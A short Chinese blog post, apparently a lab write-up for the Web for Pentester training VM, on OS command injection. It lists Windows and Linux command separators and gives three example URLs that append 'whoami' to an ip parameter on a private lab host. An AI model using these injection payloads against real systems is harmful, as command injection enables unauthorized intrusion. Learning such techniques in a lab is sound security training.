【渗透测试学习平台】 web for pentester -6.命令执行
2024-09-26 20:55:17
命令执行漏洞
windows支持:
| ping 127.0.0.1|whoami || ping 2 || whoami (哪条名令为真执行那条)
& && ping 127.0.0.1&&whoami
Linux支持:
; 127.0.0.1;whoami
| 127.0.0.1|whoami 11 1||whoami (哪条名令为真执行那条)
&& 127.0.0.1&&whoami
Example 1
http://192.168.106.154/commandexec/example1.php?ip=127.0.0.1;whoami
Example 2
http://192.168.106.154/commandexec/example2.php?ip=127.0.0.1%0awhoami
Example 3
http://192.168.106.154/commandexec/example3.php?ip=127.0.0.1|whoami
关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。
最新文章
- 解决 android 高低版本 webView 里内容 自适应屏幕的终极方法
- 在ubuntu 12.04 x64下编译hadoop2.4
- POJ1329题
- WCF SOAP
- 更改debian的软件源sources.list
- linux查看用户登录信息-w命令
- CentOS 6.4 文件夹打开方式
- 6-最基础的服务-es6写法
- 【翻译】ExtJS vs AngularJS
- 微信小程序开发07-列表页面怎么做
- 设置Delphi默认按utf8格式保存单元文件
- 方法调用 Controller的Action 参数
- HTML基础【4】:表格标签
- maven+springmvc出现:java.sql.SQLException: Unknown system variable 'query_cache_size'
- (八)lambda、列表生成式、字典转list排序
- 唐雎(jū)不辱使命
- Android 蓝牙通信——AndroidBluetoothManager
- SSH 不分配远程主机tty
- AOP学习总结
- 使用Keras开发神经网络
热门文章
- mysql 5.7.13 安装配置方法图文教程(win10) (转)
- CSS里有哪些常见的块级元素和行内元素以及其区别?
- ajaxupload 异步上传工具
- uart 超声波传感器数据读取
- Linux 网络子系统之网络协议接口层(二)
- nfs服务器与客户端配置
- KafkaStream时间戳问题CreateTime = -1引起的程序中断
- lua——string之string.gsub
- win7控制面板一打开就停止的解决方法
- http://www.casualarena.com/